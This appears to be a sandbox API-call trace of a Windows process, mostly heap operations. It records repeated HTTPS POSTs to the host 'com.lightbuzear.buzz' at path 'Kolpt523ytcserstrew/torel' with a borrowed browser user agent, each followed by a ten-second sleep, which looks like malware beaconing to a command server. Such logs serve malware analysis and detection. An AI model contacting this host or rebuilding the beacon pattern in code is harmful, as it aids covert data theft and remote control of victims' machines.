[0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a3c0 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3c0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3c0 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0215.851] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830de0 [0215.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0215.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0215.851] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0215.851] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0215.851] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830de0 | out: hHeap=0x4780000) returned 1 [0215.851] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0215.852] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0215.852] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0215.852] FreeLibrary (hLibModule=0x71570000) returned 1 [0215.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0215.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0215.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0215.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a488 | out: hHeap=0x4780000) returned 1 [0215.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0215.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0215.853] Sleep (dwMilliseconds=0x2710) [0215.856] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0215.856] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce640 [0215.856] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0215.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0215.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0215.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebf8 [0215.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0215.871] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ec28 [0215.871] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebf8 | out: hHeap=0x4780000) returned 1 [0215.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0215.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0215.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ece8 [0215.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0215.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0215.872] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0215.872] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0215.872] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb98 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb98 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2a8 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0215.873] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a488 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0215.873] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0215.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0215.874] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0215.875] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0215.875] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0215.875] FreeLibrary (hLibModule=0x71780000) returned 1 [0215.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0215.875] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0215.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0215.875] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0215.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0215.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0215.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0215.875] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0215.875] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb38 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaf0 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ead8 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0215.876] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0215.876] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0215.876] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830d18 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebe0 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea18 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebe0 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0215.877] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ecd0 [0215.877] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b38 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b38 | out: hHeap=0x4780000) returned 1 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0215.878] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6b0 [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce610 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0215.878] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0215.878] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0215.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0215.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830d40 [0215.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0215.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d40 | out: hHeap=0x4780000) returned 1 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b10 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0215.879] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48309d0 [0215.879] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0215.880] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0215.880] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48309d0 | out: hHeap=0x4780000) returned 1 [0215.880] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0215.880] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0215.880] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0215.880] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0215.880] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0215.880] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eaf0 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830e08 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830e08 | out: hHeap=0x4780000) returned 1 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48309a8 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0215.881] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b88 [0215.881] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0215.882] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0215.882] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0215.882] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0217.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b88 | out: hHeap=0x4780000) returned 1 [0217.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0217.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5e0 [0217.016] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb38 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea30 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea30 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830ae8 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0217.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd30 [0217.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830ae8 | out: hHeap=0x4780000) returned 1 [0217.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48309f8 [0217.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0217.017] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b38 [0217.017] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0217.017] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0217.018] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0217.018] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0217.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b38 | out: hHeap=0x4780000) returned 1 [0217.018] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0217.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0217.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eca0 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb38 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4830c50 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb978 [0217.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830c50 | out: hHeap=0x4780000) returned 1 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830bb0 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0217.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4830b38 [0217.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0217.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0217.020] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0217.020] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0217.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830b38 | out: hHeap=0x4780000) returned 1 [0217.021] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0217.021] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0217.021] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0217.021] FreeLibrary (hLibModule=0x71570000) returned 1 [0217.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0217.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0217.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4830d18 | out: hHeap=0x4780000) returned 1 [0217.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0217.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0217.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0217.023] Sleep (dwMilliseconds=0x2710) [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0217.040] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0217.040] RtlAllocateHeap (HeapHandle=0x4780000, 